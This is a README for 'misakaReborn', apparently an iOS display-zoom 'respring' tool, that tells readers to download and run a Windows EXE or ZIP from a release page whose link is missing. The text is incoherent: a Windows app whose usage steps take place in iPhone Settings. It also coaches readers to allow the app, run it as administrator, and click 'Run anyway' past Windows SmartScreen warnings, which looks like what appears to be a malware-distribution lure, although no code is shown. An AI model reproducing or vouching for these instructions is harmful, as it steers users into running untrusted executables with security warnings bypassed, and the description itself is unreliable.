## 🖥️ What misakaReborn does
misakaReborn helps you make the display zoom change needed for a respring-style refresh.
Use it if you want a fast way to apply the change, then switch back to your normal display zoom setting.
It is meant for simple use on Windows with a clear step-by-step flow.
## ✅ Before you start
Make sure you have:
- A Windows PC
- An internet connection
- A browser to open the download page
- Permission to run downloaded apps on your PC
If Windows shows a prompt, choose the option to allow the app to run.
## 🚀 Get the app
1. Open the release page:

2. Find the latest release near the top of the page
3. Download the Windows file from that release
4. Save it to a folder you can find again, like Downloads or Desktop
## 🛠️ Install and open
If the download is a ZIP file:
1. Right-click the ZIP file
2. Choose Extract All
3. Open the extracted folder
4. Find the app file inside
5. Double-click it to start
If the download is an EXE file:
1. Double-click the file
2. If Windows asks for permission, choose Run or Yes
3. Wait for the app window to open
## 🧭 How to use it
Follow the same flow each time you want to use it:
1. Open misakaReborn
2. Run the modification in the app
3. Go to Settings on your device
4. Open Display & Brightness
5. Open Display Zoom
6. Pick a zoom setting that is not your current one
7. Go back to the app if needed and let the change finish
8. Return to Settings
9. Set Display Zoom back to your original setting
10. Done
## 📱 What to expect
After you complete the steps, your display settings should return to normal.
The app is made for a quick change, then a return to your usual setup.
If the screen looks different for a moment, that is part of the process.
## 🔧 Tips for best results
- Keep the app open until the change finishes
- Do not close Settings too fast
- Use the latest release from the download page
- Make sure you return to your original Display Zoom setting after the change
- If the app does not open, try running it again from the extracted folder
## 🧩 Common issues
### The file will not open
- Check that the download finished
- Make sure you extracted the ZIP file first
- Try right-clicking the file and choosing Run as administrator
### Windows blocks the app
- Select More info if you see it
- Then choose Run anyway if Windows gives that option
### I cannot find the release file
- Go back to the releases page
- Look for the newest version at the top
- Check the Assets section under that release
### The settings do not change
- Run the modification again in the app
- Confirm that you picked a different Display Zoom option
- Switch back to your original setting after the change
## 📂 File types you may see
Depending on the release, you may get one of these:
- EXE file: run it directly
- ZIP file: extract it first, then open the app inside
- Other Windows package: follow the same basic download and open flow
## 🧼 Safe use on Windows
- Download only from the release page
- Keep the file in a folder you trust
- Do not rename files unless you need to
- Remove old downloads when you no longer need them
